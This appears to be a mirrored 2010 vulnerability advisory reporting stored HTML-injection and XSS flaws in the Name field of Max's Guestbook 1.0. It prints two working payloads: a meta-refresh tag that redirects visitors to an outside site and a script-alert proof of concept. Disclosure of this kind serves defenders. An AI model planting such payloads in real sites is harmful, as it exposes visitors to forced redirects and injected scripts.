Max's Guestbook (HTML Injection/XSS) Multiple Vulnerabilities

2014-07-0100:00:00

Root

www.seebug.org

JSON

No description provided by source.


                                                ================================================================
#                       In the name of ALLAH !                       #
======================================================================
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
#################################
#      _____ __   __   /_  __/  #
#     / ___/  \ \  / /     / /     #
#    (__  )     \ \/ /     / /      #
#   /____/     \__/    /_/       #
#################################
########################################################################
# Name: Max&#39;s Guestbook 1.0 (XSS/HTML Injection) Multiple Vulnerabilities
# Vendor: http://www.phpf1.com/download.html?item=18
# Date: 2010-08-15
# Author: MiND
# Greets: Sa-ViRuS.CoM,RENO,Dr.php,!BaD BoY!,Gov.HaCker,AntiSeCuRe,Dr.$audi...
# Contact: [email protected]
# Home: WwW.Sa-ViRuS.CoM
########################################################################


[~] HTML Injection Vuln . :
Add A New Comment And The exploit is in Name :)
&#60;meta http-equiv=&#34;refresh&#34; content=&#34;0;url=http://sa-virus.com/&#34; /&#62; 
( thats redirecting to sa-virus.com ) 


[~] Xss Vuln. : 
Add A New Comment And The exploit is in Name :)
&#60;script&#62;alert(&#39;MiND - Sa-ViRuS.CoM&#39;)&#60;/script&#62;



Peace

JSON